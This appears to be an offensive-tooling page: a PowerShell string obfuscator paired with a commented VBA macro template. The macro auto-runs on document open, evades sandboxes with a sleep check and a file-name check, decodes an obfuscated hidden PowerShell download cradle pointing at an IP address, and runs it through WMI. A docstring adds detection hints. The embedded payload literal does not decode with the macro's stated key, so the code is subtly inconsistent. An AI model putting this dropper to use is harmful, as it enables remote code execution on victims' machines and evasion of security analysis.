Obfuscate VBA strings for evasion
function ObfuscateString($inputString, $rotKey) {
    <#
    .SYNOPSIS
        Encodes a string as a run of fixed-width, three-digit decimal groups.
    .DESCRIPTION
        Each character is converted to its byte value, $rotKey is added, and the
        sum is written as decimal text left-padded with zeros to three characters.
        The groups are concatenated with no separator.

        Despite the parameter name this is a plain additive shift, not a rotation:
        nothing wraps around. It is an encoding, not encryption; subtracting the
        key from each three-digit group restores the original text.

        For anyone reviewing documents or macros: the output is a digit-only
        literal whose length is a multiple of three, typically consumed three
        characters at a time by a Chr(value - key) style decoder. Long all-digit
        string literals next to such a decoder are the pattern to look for.
    .PARAMETER inputString
        Value to encode; ToString() is called on it before splitting into chars.
    .PARAMETER rotKey
        Number added to every character's byte value.
    .OUTPUTS
        System.String. The concatenated three-digit groups.
    #>
    [string]$encoded = ""
    foreach ($ch in $inputString.ToString().ToCharArray()) {
        # The [byte] cast only accepts character codes 0-255.
        [string]$digits = [byte][char]$ch + $rotKey

        # Pad to exactly three characters. A value whose text is not one to
        # three characters long matches no case and contributes nothing.
        switch ($digits.Length) {
            1 { $encoded += [string]"00" + $digits }
            2 { $encoded += [string]"0" + $digits }
            3 { $encoded += $digits }
        }
    }
    return $encoded
}
## Usage: ObfuscateString <string> <rot key> | |
# Sample inputs, each encoded with key 12 and written to the output in order:
# a WMI moniker, a document file name, a WMI class name and a full command line.
# The macro example on this page passes the decoded last value to
# Win32_Process.Create, so the plain-text command line is what process-creation
# logging would record, whatever the document itself contains.
@(
    "winmgmts:",
    "app.docm",
    "Win32_Process",
    "powershell -exec bypass -nop -w hidden -c iex(new-object net.webclient).downloadstring('http://192.168.49.66/run.txt')"
) | ForEach-Object { ObfuscateString $_ 12 }
## Example usage in Office macro | |
# Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long | |
# Sub Document_Open() | |
# MyMacro | |
# End Sub | |
# Sub AutoOpen() | |
# MyMacro | |
# End Sub | |
# Function Grass(Goats) | |
# Grass = Chr(Goats - 12) ' 12 = ROT key | |
# End Function | |
# Function Screen(Grapes) | |
# Screen = Left(Grapes, 3) | |
# End Function | |
# Function Gorgon(Topside) | |
# Gorgon = Right(Topside, Len(Topside) - 3) | |
# End Function | |
# Function Yellow(Troop) | |
# Do | |
# Shazam = Shazam + Grass(Screen(Troop)) | |
# Troop = Gorgon(Troop) | |
# Loop While Len(Troop) > 0 | |
# Yellow = Shazam | |
# End Function | |
# Function MyMacro() | |
# Dim Apples As String | |
# Dim Leap As String | |
# Dim t1 As Date | |
# Dim t2 As Date | |
# Dim time As Long | |
# t1 = Now() | |
# Sleep (5000) | |
# t2 = Now() | |
# time = DateDiff("s", t1, t2) | |
# If time < 4.5 Then | |
# Exit Function | |
# End If | |
# ' Obfuscated file name (generated by PowerShell script) | |
# If ActiveDocument.Name <> Yellow("109124124058112123111121") Then | |
# Exit Function | |
# End If | |
# ' Obfuscated payload (generated by PowerShell script) | |
# Apples = "129128136118131132121118125125049062118137118116049115138129114132132049062127128129049062136049121122117117118127049062116049122118137057057127118136062128115123118116133049132138132133118126063127118133063136118115116125122118127133058063117128136127125128114117132133131122127120057056121133133129075064064066074067063066071073063066066074063066067065064115128128124063133137133056058058" | |
# Leap = Yellow(Apples) | |
# ' First string: "winmgmts:" | |
# ' Second string: "Win32_Process" | |
# GetObject(Yellow("131117122121115121128127070")).Get(Yellow("099117122063062107092126123111113127127")).Create Leap, Tea, Coffee, Napkin | |
# End Function |